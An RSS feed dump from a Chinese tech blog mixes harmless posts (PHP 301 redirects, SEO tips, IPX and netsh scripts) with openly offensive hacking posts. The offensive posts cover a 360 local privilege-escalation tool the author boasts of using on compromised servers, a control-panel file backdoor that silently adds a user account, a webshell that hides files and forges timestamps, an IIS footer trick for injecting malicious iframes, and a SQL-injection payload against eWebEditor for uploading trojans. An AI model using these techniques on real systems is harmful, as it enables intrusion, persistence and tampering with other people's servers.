<![CDATA[水土不服's blog - 技术研究]]> http://www.ruery.net/ zh-cn PBlog2 v2.4 水土不服's blog http://www.ruery.net/images/logos.gif http://www.ruery.net/ 水土不服's blog http://www.ruery.net/article/Technology/PHP301.htm <![CDATA[PHP网站301重定向方法详解 ]]> admin@ruery.com(Ruery) Fri,05 Feb 2010 18:00:08 +0800 http://www.ruery.net/default.asp?id=2749 http://blog.sina.com.cn/s/blog_5b2b55380100ck85.html

<? Header( "HTTP/1.1 301 Moved Permanently" );  
Header( "Location: http://www.ypeng.cn" );?>

这个代码只适应于网站迁移的情况,即旧站和新站域名不同、根目录也不相同的情况。如果网站属于一个网站绑定2个域名,2个域名的根目录为同一个,那么,就会行成死循环。在此,将PHP网站301重定向方法完全放出,希望能帮到新人,如果有不足之处,也请高手指出,不胜感激。

这个代码只适应于网站首页的301重定向,如果网站已经被收录,或存在大量的非首页外链,要全部定向过来,那就无能为力了。更合适的方法是使用.htaccess来定向,简单快捷。不过笔者在此将PHP网站301重定向方法完全放出,希望能帮到新人,如果有不足之处,也请高手指出,不胜感激。

一、建立一个301.inc.php(文件名自取)

<?php  
$the_host = $_SERVER['HTTP_HOST'];//取得进入所输入的域名
$request_uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '';//判断地址后面部分
if($the_host !== 'www.ypeng.cn')//这是我要以前的域名地址
{
  header('HTTP/1.1 301 Moved Permanently');//发出301头部
  header('Location: http://www.ypeng.cn'.$request_uri);//跳转到我的新域名地址
}
?>

其中if($the_host !== 'www.ypeng.cn')中的“!==”是不完全等于的意思,也可以用“!=”不等于,这样,就可以将以前的域名,包括old.com、www.old.com以及新域名中我ypeng.cn全部重定向到www.ypeng.cn。

二、在网页文件中调用301.inc.php

<?php include("301.inc.php"); //301重定向 ?>

将这个代码放到你所有网页的最前面。

好了,重定向就做好了,将301文件上传到网站目录,就可以去看着你的成果了。 ]]> http://www.ruery.net/article/Technology/360webshell.htm <![CDATA[360安全卫士本地提权漏洞的webshell利用程序]]> admin@ruery.com(Ruery) Wed,03 Feb 2010 21:46:32 +0800 http://www.ruery.net/default.asp?id=2747 http://www.oldjun.com/blog/index.php/archives/60/

不知道该说什么好了,以前拿了很多shell,一直懒得提权,一是没那个必要,二是提权太累了,三是服务器类型的肉鸡多了也没啥用。不过要是能让我一下子就成功提权,何乐而不为呢?

于是360本地提权来了,最近已经沸沸扬扬的了,不多发表过多评论,只是觉得做公司更要厚道;本人菜另外还有很多兄弟在360,不说什么了,发了本地提权的利用程序吧。friddy那里已经有一份了,是用来替换5下shift为cmd.exe的:下载文件 点击下载此文件

瑞星说是“bregdrv.sys和bregdll.dll”出的问题,然后http://www.sebug.net/exploit/19048/这个poc也是直接load这个dll的,于是这个利用程序也是基于这个的。webshell下使用,guest权限即可,需要Wscript.shell支持,功能主要是:

1.开启终端服务,端口为3389;用法:360.exe port

2.替换5下shift为cmd;用法:360.exe sethc

另外大家可以参考下包子的文章:360 0day漏洞及相关内幕,360很多dll存在类似的调用问题。据360的公告介绍已经打补丁了,具体是真是假,大家自己试试这个工具还能不能用吧。

这个工具不针对任何公司和个人,仅限爱好渗透的同学们进行交流。话说昨天从下午到晚上,我2、3年来拿到的仍然健在的shell的满足3389打开与安装了360安全卫士的服务器我都提了一下权,发现360在服务器的普及率也高的惊人,至少有80%,怪不得大家都提权提的爽死了,于是乎,很多肉鸡终于找到家了。

现在终于知道服务器类型的肉鸡的好处了,一是用来上线;二是用来摆放垃圾未备案域名;三是用来跑密码...看来之前轻视了。

程序代码 程序代码
上周六晚,sec@nanjing的孩子们又聚了一次,这次还有嘉宾:flashsky前辈,于是,吃饭的同时,使劲的瞻仰与膜拜诸位大牛,但愿有朝一日能跟他们一样牛:)




(注:本图片只限学习,拒绝按此方法进行破坏或者瑞星公司拿此图片作为炒作)

下载:下载文件 点击下载此文件]]> http://www.ruery.net/article/Technology/SEO.htm <![CDATA[如何伪原创进行SEO优化?]]> admin@ruery.com(Ruery) Wed,03 Feb 2010 21:39:30 +0800 http://www.ruery.net/default.asp?id=2746
一.修改标题是关键

(1)代替法(伪装原创改动标题是必须要做的)

数字减少法: 瘦脸的五种方法可以改成瘦脸的三种方法,把两外两种给去掉,这两种可以自己选择,你可以选择最没有用还是感觉不好的。但是这只是题目,不单单去掉就可以,详细方法见下面说明。

文字代替法:瘦脸的五种方法可以改成轻松有效瘦脸的五种方法,在你没有更改文章的内容的同时,搜索引擎不会认为你题目是copy别人的,会认为你题目是属于原创的。

(2)排序法

可以将文章的标题的顺序进行调整,但是不能改变原来的意思,更不能与文章的内容不符合,如果是出现文章的标题和内容不相关的那会给浏览者带来什么样的感觉,那他们会再次来你的网站吗?会相信你是一个品牌吗?

例子:什么是瘦脸最有效的方法?可以改成最有效的瘦脸方法是什么?

(3)关键词法

题目适当的加上关键词,有的时候甚至可以把一个长尾关键词当做一个题目。
例子:美丽达人如何瘦脸有“术” 这里是有加上关键词:如何瘦脸
如何瘦脸最有效? 这里是把整个长尾关键词作为一个题目
什么是长尾关键词呢?长尾关键词具有的特征如:
1. 比较长,往往是2-3个词组成,甚至是短语。
2. 存在于内容页面,除了内容页的标题,还存在于内容中。
3. 搜索量非常少,并且不稳定。
4. 长尾关键词带来的客户,转化为网站产品客户的概率比目标关键词低很多。
5. 存在大量长尾关键词的大中型网站,其带来的总流量非常大。
(4)加h1法

文章标题加上h1标签,突出重点,用div+css控制一下不要让字体太大影响美观。
提醒:

但是标题的内容进行原创,但不是提倡把题目改成不七不八的,这样的结局是不可取的,题目中要突出有浏览者想要看的能能吸引人的因素,像美丽达人如何瘦脸有 “术”这样的题目就有突出如何瘦脸,因为用户搜索瘦脸的时候很大一部分就是想如何去瘦脸,当他们看到这样的字眼在的时候就很有可能会点击进去。

二.内容伪原创

seoER对文章的seo不单单是标题的优化,同时还要会文章如何有技巧的去编辑,搜索引擎不单单看的是标题还要看文章。

(1)文章首段、尾端

文章首段加上自己的一句话,可以是一个小故事啊,可以是一段导语,小调查,也可以是…
文章尾端可以是一个有情提醒啊,专家提醒,友情推荐(推荐一篇好的文章),个人建议,小编推荐等等
搜索引擎一看的时候就会觉得说,这个文章是别人没有的,首尾都是自己的文字的时候,搜索引擎就会觉得这是一种原创,是一种首尾呼应的原则。
提醒:进行编辑首段的时候尽量加上文章关键词,并且给关键词加粗,同时还要记得尽量给尾段加上一个关键词,原理是蜘蛛爬的时候是从左边到右,从上到下。如 果前面出现关键词的时候蜘蛛会认为这是一篇相关性很强的文章,同时起到增加关键词密度的作用,但是不能影响阅读这是前提,永远要记住用户体验才是最关键 的,一个品牌的影响是靠细节的造化。

(2) 文章中给关键词加上链接

例如:如何瘦脸其实这次词语就是给加上连接的,而且在文章中出现当别人把他复制走的时候也就给我们带上了连接,也就是添加的一个外链,这样算来是公平的。
文章:http://www.fzzyzx.com/xwzx/mldr/2356_2.shtml不懂的人请看下这个页面怎么去做。
曾经这个页面做到百度的第五位,前四位是百度竞价的。可想而知这样的效果有多大。

(3)内容小技巧

1、拆分法 原有连续的文章,平均的截取成为2段3段或是更多,或把文章段落的位置改变一下顺序。
2、标签法 定的关键字后增加友情注释。例如:我们所倡导的SEO(SEO相关信息)思想是加入用户体验,让客户可以了解更多并不熟悉的专业名词,从而更好理解文章含义。这样还可以自然的重复关键字,增加关键字密度。
3、隐身法将一些没有实际用处的词用图片来进行代替,经过优化的GIF图片只有十几个字节,将文章中出现的部分特定字或词进行隐身,也可以很好的达到降低页面相似度的效果。
4、打乱法文章添加上一到两句话,也能起到降低页面相似度的效果。

(4)标题、关键词、描述

重点:标题,关键词,描述都要出现关键词,目的:提高关键词的权重

例子:




分析:

Title、keywords:
说明:为搜索引擎提供的关键字列表和题目
怎样瘦脸最有效 —-à 标题出现关键词:怎样瘦脸,瘦脸但是这里没有很好的利用 meta content=”昆明” name=”keywords”正确的是meta content=”怎样瘦脸|瘦脸” name=”keywords” 这里写关键字的时候记得用上|或者是,但是要记住不能用错成,一个是半角,一个是全角。但是个人推荐用用|。

Description:说明:Description用来告诉搜索引擎你的网站主要内容。content=”如何瘦脸是….” 这里写的会在标题后面显示,详细见图,写的好与坏也直接影响到点击率的多与少。
也就是说是几句比较简炼的描述网页标题和内容的话,并不是像Keywords那样把关键词罗列出来。描述的文字不必太多(建议控制在200个字符以内,关键字重复出现三四次即可,不要过多堆积),同时每个页面不能使用同样的Description。每个页面都是不一样的。
标题的字数我就不想提了,因为不相信你一个题目会写多长,不懂就自己去查查字典什么是标题就知道了,太多了那就不是标题了这点自己总知道吧。至于描述字数

(5)坚持更新

建整形美容网这个网站算是整形美容行业网站的一个佼佼者就是因为坚持每天更新坚持每天原创和伪原创才使得现在的收录site:fzzyzx.com 找到相关网页约12,400篇,现在这个网站网络来的业绩是整个福建整形业绩最高的,这是不可否认的。每天坚持去更新的同时蜘蛛会养成一个很好的习惯,每 天有新的文章的时候蜘蛛就会很勤奋的过来抓取。坚持每天更新也是一个网站想要获得好的排名的一个重要因素。]]> http://www.ruery.net/article/Technology/seohtml.htm <![CDATA[SEO中HTML标签权重]]> admin@ruery.com(Ruery) Wed,11 Nov 2009 11:22:49 +0800 http://www.ruery.net/default.asp?id=2738
内部链接文字:10分
标题title:10分
域名:7分
H1,H2字号标题:5分
每段首句:5分
路径或文件名:4分
相似度(关键词堆积):4分
每句开头:1.5分
加粗或斜体:1分
文本用法(内容):1分
title属性:1分 (注意不是标题, 是title属性, 比如a href=”" title=”")
alt标记:0.5分
Meta描述(Description属性):0.5分
Meta关键词(Keywords属性):0.05分

二、网站内部优化需要注意的问题

1、静态页面
将信息页面和频道、网站首页改为静态页面,有利于搜索引擎更快更好的收录。

2、 页面标题(Page Title)的关键词优化
必须列出信息的标题、网站的名称以及相关关键字。

3、 Meta标签的优化(过去搜索引擎优化的重要手法,现在已经不是关键因素,但仍不可忽略)
主要包括:Meta description、Meta keywords的设置。关键字密度要适度,通常为2%-8%,也就是说你的关键字必须在页面中出现若干次,或者在搜索引擎允许的范围内,要避免堆砌关键字。

4、针对Google制作Sitemaps
Google的sitemaps是对原来robots.txt的扩展,它使用 XML格式来记录整个网站的信息并供Google读取,使搜索引擎能更快更全面的收录网站的内容。

5、 图片的关键词优化
图片的替代关键词也不要忽略,其另外一方面的作用是,当图片不能显示的时候,可以给访问者一个替代解释语句。

6、 避免表格的嵌套
目前本站的表格嵌套太多,搜索引擎通常只读取3个<table>的嵌套,如果太多,会造成部分有用信息没有被检测到,建议使用DIV。

7、 采用web标准进行网站重构
尽量使网站的代码符合W3C的HTML 4.0或XHTML 1.0规范。通过XML+CSS技术进行网站重构,减少不表格及冗余代码,提高网站页面的扩展性,兼容性,可以使更多浏览器支持。

8、 网站结构的扁平化规划
目录和内容结构最好不要超过3层,如果有超过三层的,最好通过子域名来调整和简化结构层数。另外目录命名的规范做法是使用英文而不是拼音字母

9、 页面容量的合理化
合理的页面容量会提升网页的显示速度,增加对搜索引擎蜘蛛程序的友好度。同时建议js脚本和css脚本尽量用链接文件

10、外部文件策略
把javascript文件和css文件分别放在js和css外部文件中。这样做的好处是把重要的页面内容放到页面顶部,同时能缩小文件大小。有利于搜索引擎快速准确地抓取页面重要内容。其他的字体(FONT)和格式化标签也尽量少用,建议采用CSS定义。

11、外部链接
尽可能多地让其他跟你主题相关的网站链接本站,同时尽量同PR值更高的网站进行相互链接。如果网站提供与主题相关的导出链接,被搜索引擎认为有丰富的与主题相关的内容,也有利于排名,例如各类招商网站、投融资网站的概念。另外避免链接不顾质量的大面积撒网,对搜索引擎而言宁少要精。

12、网站地图
网站自身的网站地图是搜索引擎更全面索引收录你的网站的重要因素。建议制作基于文本的网站地图,内含网站所有栏目、子栏目。网站地图的三大因素:文本、链接、关键词,都极其有利于搜索引擎抓取主要页面内容。特别是动态生成目录网站尤其需要 创建网站地图。

13、图像热点
除AltaVista、Google明确支持图像热点链接外,其他引擎暂不支持。当“蜘蛛” 程序遇到这种结构时,就会无法辨别。因此尽量不要设置图像热点(Image Map)链接。

14、FLASH应用
FLASH由于不含文字信息,应尽量用于功能展示和广告,少用于网站栏目和页面。

15、JS脚本
在不支持JS脚步的浏览器里 NOSCRIPT》 标签会起到重要提示作用,对搜索引擎的Spider搜索也会有帮助。

16、Frame框架
Frame标签会被搜索忽略,尽量少用,如果一定要用,则应正确使用Noframe标签, 在<Noframe></Noframe>区域中包含指向frame页的链接或带有关键词的描述文本,同时在框架以外的区域也出现关键词文本。

17、资讯的内部链接
有助提高网站排名和PR值,例如相关资讯、推荐资讯等]]> http://www.ruery.net/article/Technology/cplxp.htm <![CDATA[利用cpl文件在xp中留一个后门]]> admin@ruery.com(Ruery) Sat,11 Jul 2009 12:22:33 +0800 http://www.ruery.net/default.asp?id=2720
这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组 件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)



我们在里边加几行js语句:
程序代码 程序代码
var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)


当然你加下载者更好,我只是做个示例。

然后:
程序代码 程序代码
echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl


替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。

这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。]]> http://www.ruery.net/article/Technology/Asp-webshell.htm <![CDATA[隐藏并修改文件的最后修改时间的asp-webshell]]> admin@ruery.com(Ruery) Sat,07 Mar 2009 17:11:55 +0800 http://www.ruery.net/default.asp?id=2700
隐藏并修改文件的最后修改时间的asp-webshell。

源码:
程序代码 程序代码
<%
'隐藏并修改文件的最后修改时间的aspshell
'原理:通过FSO可以修改文件的属性,比如设置为只读,隐藏,系统等等;FSO中的attributes属性修改文件属性,1只读,2隐藏,4系统文件
'     通过shell.application可以给文件重新设置一个最后修改时间
'2009/02/24  write by skyfire
response.write "<form method=post>"
response.write "路&nbsp;&nbsp;&nbsp;&nbsp;径:<input name=path value='"&server.mappath("/")&"' size='30'>(一定要以\结尾)<br />"
response.write "文件名称:<input name=filename value='test.txt' size='30'><br />"
response.write "修改时间:<input name=time value='12/30/2099 12:30:30' size='30'><br />"
response.write "<input type=submit value=修改并隐藏文件>"
response.write "</form>"

'获取提交的参数
set path=request.Form("path")
set fileName=request.Form("filename")
set newTime=request.Form("time")

if( (len(path)>0)and(len(fileName)>0)and(len(newTime)>0) )then

'通过fso设置文件属性
Set fso=Server.CreateObject("Scripting.FileSystemObject")
Set file=fso.getFile(path&fileName)
file.attributes=2+4  '设置文件属性为隐藏+系统

'通过shell.Application修改文件的最后修改时间
Set shell=Server.CreateObject("Shell.Application")
Set app_path=shell.NameSpace(server.mappath("."))
Set app_file=app_path.ParseName(fileName)
app_file.Modifydate=newTime

end if
%>


]]> http://www.ruery.net/article/Technology/IPX.htm <![CDATA[批处理添加IPX协议]]> admin@ruery.com(Ruery) Sat,07 Mar 2009 16:35:44 +0800 http://www.ruery.net/default.asp?id=2699
将下面的代码保存为 *.bat,如1.bat

@echo off
ipconfig /all | find /I "IP Address">IP_.txt
for /f "tokens=15" %%M in (IP_.txt) do set IP=%%M
echo REGEDIT4 >reg.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NwlnkIpx\Parameters] >>reg.reg
echo "VirtualNetworkNumber"=dword:00000%IP:~10% >>reg.reg
regedit /s reg.reg
del IP_.txt
del reg.reg
exit

单网卡改内部网络号
@for /f "tokens=16 delims=." %%i in ('ipconfig^|find /i "ip Address"') do reg add HKLM\SYSTEM\CurrentControlSet\Services\NwlnkIpx\Parameters /v VirtualNetworkNumber /t reg_dword /d %%i /f

根据时间改内部网络号(毫秒)
@reg add HKLM\SYSTEM\CurrentControlSet\Services\NwlnkIpx\Parameters /v VirtualNetworkNumber /t reg_dword /d %time:~6,2%%time:~-2% /f ]]> http://www.ruery.net/article/Technology/Iframe.htm <![CDATA[一种特殊的Iframe挂马的解决方法]]> admin@ruery.com(Ruery) Sun,15 Feb 2009 14:14:59 +0800 http://www.ruery.net/default.asp?id=2697
作者:Lawson

今天访问公司的一个网站,突然发现网页显示不对,右键查看HTML代码,发现iframe了一个网站的js文件,不用说,肯定被挂马了。

进入服务器,看了下文件源代码里并没有这个iframe的代码,但整个服务器的所有网站访问后代码里都自动加了这个iframe代码。

我第一反应会不会是IIS映射被修改了啊,查看了下



里面也没什么被修改的

突然我想起以前大学的时候,学校网站也出现过这个问题,是当时疯狂的ARP病毒引起的,就是不是本机有病毒,网络中有混杂模式的机子。于是我想建议装一个ARP防火墙。网络上搜了下,说也可能是IIS里WEB服务扩展引起的,于是我又看了下,发现没什么问题。

最后我突然发现一个地方,有异常,就是这里,让我暂时解决了这个问题(可能系统中有DLL或EXE文件病毒了,还要系统杀毒才行,服务器不是我管,我也只能干着急了。)

如下图:



启动文档页脚,这里附加了一个htm文件,我用文本文档打开c:\windows\system32\com\iis.htm,发现里面就是这个 iframe的代码,而且这个htm正常情况也是没有的,于是我把起用文档页脚去掉,把这个htm文件删了,问题就暂时解决了(因为可能系统还有病毒,所 以算暂时解决吧)

网上很多人说自己服务器中了ARP病毒攻击,IIS尾巴之类的,如果都没能解决,请注意看下起用文档这个地方,希望对你有帮助。

以前也玩过一段时间马,不过好久没碰这些了,根据这个js文件,我找到了很多htm文件,都是病毒网站上的,我下载下来了,有空要好好分析分析,如果闲得慌,给他服务器扫描扫描,帮他服务器找找后门:)

------------------------------

刚刚看了下,原来做这种木马只需要在C:\WINDOWS\system32\inetsrv\MetaBase.xml插入一段代码就行了(C是系统盘),比如:

<IIsWebVirtualDir Location ="/LM/W3SVC/81120797/root"
AccessFlags="AccessRead | AccessScript"
AppFriendlyName="默认应用程序"
AppIsolated="2"
AppRoot="/LM/W3SVC/81120797/Root"
AuthFlags="AuthAnonymous | AuthNTLM"
DefaultDocFooter="FILE:C:\WINDOWS\system32\Com\aa.htm"

如上,在DefaultDocFooter="FILE:C:\WINDOWS\system32\Com\aa.htm"插入有木马的htm文件就行了,没什么难度,不过知道原理后,自己不要做破坏就行了。:)]]> http://www.ruery.net/article/Technology/union.htm <![CDATA[union select控制ewebeditor上传文件后缀]]> admin@ruery.com(Ruery) Sun,15 Feb 2009 14:13:35 +0800 http://www.ruery.net/default.asp?id=2696 作者:X.Z.cool

目前网上流传太多ewebeidtor的修改版 lite版
216版的ewebeditor 存在一个注入漏洞 之后一个版也存在这样的问题
前段时间拉至尊宝渗透一内网时发现这个东西
无后台 无法登陆 默认数据库 但用处也不大
所以就深刻研究了下这个注入 发现可以通过union 来控制允许上传类型的列表
随后时间成功利用此漏洞拿了不少东西 分享下

漏洞文件是upload.asp
程序代码 程序代码
Sub InitUpload()
sType = UCase(Trim(Request.QueryString("type")))
sStyleName = Trim(Request.QueryString("style"))
sSql = "select * from ewebeditor_style where s_name='" & sStyleName &
"'"
ors.Open sSql, oConn, 0, 1
If Not ors.Eof Then
sUploadDir = ors("S_UploadDir")
sUploadDir = Replace(sUploadDir, "\", "/")
If Right(sUploadDir, 1) <> "/" Then
sUploadDir = sUploadDir & "/"
End If

Select Case sType
Case "FILE"
sAllowExt = ors("S_FileExt")
nAllowSize = ors("S_FileSize")
Case "MEDIA"
sAllowExt = ors("S_MediaExt")
nAllowSize = ors("S_MediaSize")
Case "FLASH"
sAllowExt = ors("S_FlashExt")
nAllowSize = ors("S_FlashSize")
Case Else
sAllowExt = ors("S_ImageExt")
nAllowSize = ors("S_ImageSize")
End Select
Else
OutScript("parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!')")
End If
ors.Close
' 任何情况下都不允许上传asp脚本文件
sAllowExt = Replace(UCase(sAllowExt), "ASP", "")
End Sub

sStyleName变量是直接从style中读取到没有经过任何过滤
我们要做的就是通过 union 增加一个 sAllowExt类型 构造
程序代码 程序代码
upload.asp?action=save&type=IMAGE&style=fox' union select
S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileE­xt,S_FlashExt,
[S_ImageExt]+'|
cer',S_MediaExt,S_RemoteExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,­S_RemoteSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl,S_UploadObje­ct,S_AutoDir,S_BaseHref,S_ContentPath,S_AutoRemote,S_ShowBorder
from ewebeditor_style where s_name='standard' and 'a'='a

union要之前的select结果为空(这个好办)
同时要知道字段数(下载到数据库查也能查到了)
我使用[S_ImageExt]+'|cer'使S_ImageExt中加入"|cer"串。
用NC发包就可以上传木马了。

针对没有后台 有默认数据库 或者猜解不到密码的时候 可以用此方法试下 默认库中会泄露ewebeditor的版本信息的.]]> http://www.ruery.net/article/Technology/2695.htm <![CDATA[Windows下使用脚本快速切换网络配置]]> admin@ruery.com(Ruery) Sun,15 Feb 2009 14:04:46 +0800 http://www.ruery.net/default.asp?id=2695
作者:北极冰仔

在不同地方上网总要来回改网络配置,手敲一堆 IP、DNS 甚是麻烦,是否可以把常用的网络配置做成脚本?Google 后有收获。

(此处删节数百言,寡人表达能力待提升空间实在太大)


这篇写得非常好,特此推荐:《NetSH 使用方法》。文章内容有点多,为节约大家宝贵时间,下面贴个示例脚本抛砖引玉:

int ip
set address name=”Local Area Connection” source=static addr=192.168.2.226 mask=255.255.255.0
set address name=”Local Area Connection” gateway=192.168.2.254 gwmetric=0
set dns name=”Local Area Connection” source=static addr=208.67.222.222 register=PRIMARY
add dns name=”Local Area Connection” addr=202.114.xxx.xxx index=2注解:
1. 以 .sh 扩展名保存脚本,如 D:\lab.sh。
2. name=”XXX” 中的 XXX 是待修改网络连接的名称。
3. 安全起见,我隐去了最后一行代码中的副 DNS 地址,请各位视实际情况修改。
4. 新建一 .bat 文件,如 lab.bat,写入

@echo off
netsh exec d:\lab.sh5. 执行 lab.bat 即可将网络配置快速切换至 lab 环境。]]>